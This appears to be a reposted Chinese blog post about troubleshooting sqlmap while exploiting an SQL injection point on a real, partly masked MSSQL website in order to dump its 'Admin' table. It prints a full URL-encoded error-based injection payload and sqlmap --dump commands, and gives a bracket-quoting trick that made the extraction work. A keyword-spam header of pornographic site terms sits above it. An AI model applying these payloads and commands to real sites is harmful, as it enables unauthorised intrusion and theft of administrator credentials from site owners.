日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

sqlmap注入检测经验0x01

發布時間:2025/3/15 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 sqlmap注入检测经验0x01 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

某日偶遇一SQLInjection Point,MSSQL 2008,已開啟顯錯模式。
馬上扔進SQLMap跑,一路順暢,竟然還是SA的權限,心想運氣真好,無論如何都拿定了。
數據庫,表,列都列出來了,但是上–dump參數就死活跑不出來。
報錯 “unable to retrieve the number of entries for table ‘Admin’ in database ‘2012_xxxx’”——x是馬賽克哈:)
心想應該很容易搞定,遂查找手工注入方法,測試無果。
還是回到SQLMap,-h查看幫助,發現-v 參數可以指定輸出詳細度,開到-v 3,發現顯示了payload,一不做二不休,直接開到-v 5,發現提供了整個http請求,怪不得報錯,原來都是返回500,用firefox打開完整payload,說是語法錯誤。

Xhttp://www.xxxx.cn/xxx/detail.aspx?id=218%20AND%204416%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28115%29%2BCHAR%28119%29%2BCHAR%28100%29%2BCHAR%28113%29%2B%28SELECT%20ISNULL%28CAST%28COUNT%28*%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20%222012_xxxx%22..syscolumns%2C2012_xxxx..sysobjects%20WHERE%202012_xxxx..syscolumns.id%3D2012_xxxx..sysobjects.id%20AND%202012_xxxx..sysobjects.name%3DCHAR%2884%29%2BCHAR%2866%29%2BCHAR%2895%29%2BCHAR%2865%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%28105%29%2BCHAR%28110%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28104%29%2BCHAR%28113%29%29%29

顯然是2012的問題,也就是應該是錯把庫名中的數字錯當成參數了

在URL的庫名加上雙引號包裹,果然就可以爆出數據了。

問題又來了,要我手工爆數據我可搞不定,還是要回到SQLMap啊,意思是要想辦法把庫名包裹起來,不讓系統把它解析成一個參數

XTEST1: ./sqlmap.py -u http://www.xxxx.cn/xxxx/detail.aspx?id=218 –dump -D”‘2012_xxxx” -T’Admin’

這次好一點了,還是報錯unable to retrieve column names for table ‘Admin’ in database ‘”2012_xxxx”‘,意思是有返回了,但是庫名不對。

XTEST12 ./sqlmap.py -u http://www.xxxx.cn/broadband/detail.aspx?id=218? –dump -D”[2012_xxxx]” -T’Admin’

我也不記得哪來的靈機一動,改用中括號包裹,果然就成功了,dump出整個表了。

XCONCLUSION:在使用SQLMap時可以使用-v參數指定輸出詳細度,然后直接用瀏覽器查看payload,確定語法錯誤點后想辦法改進。在遇到系統誤判庫名表名是可用中括號包裹名字。

轉載于:https://www.cnblogs.com/milantgh/p/4908812.html

總結

以上是生活随笔為你收集整理的sqlmap注入检测经验0x01的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。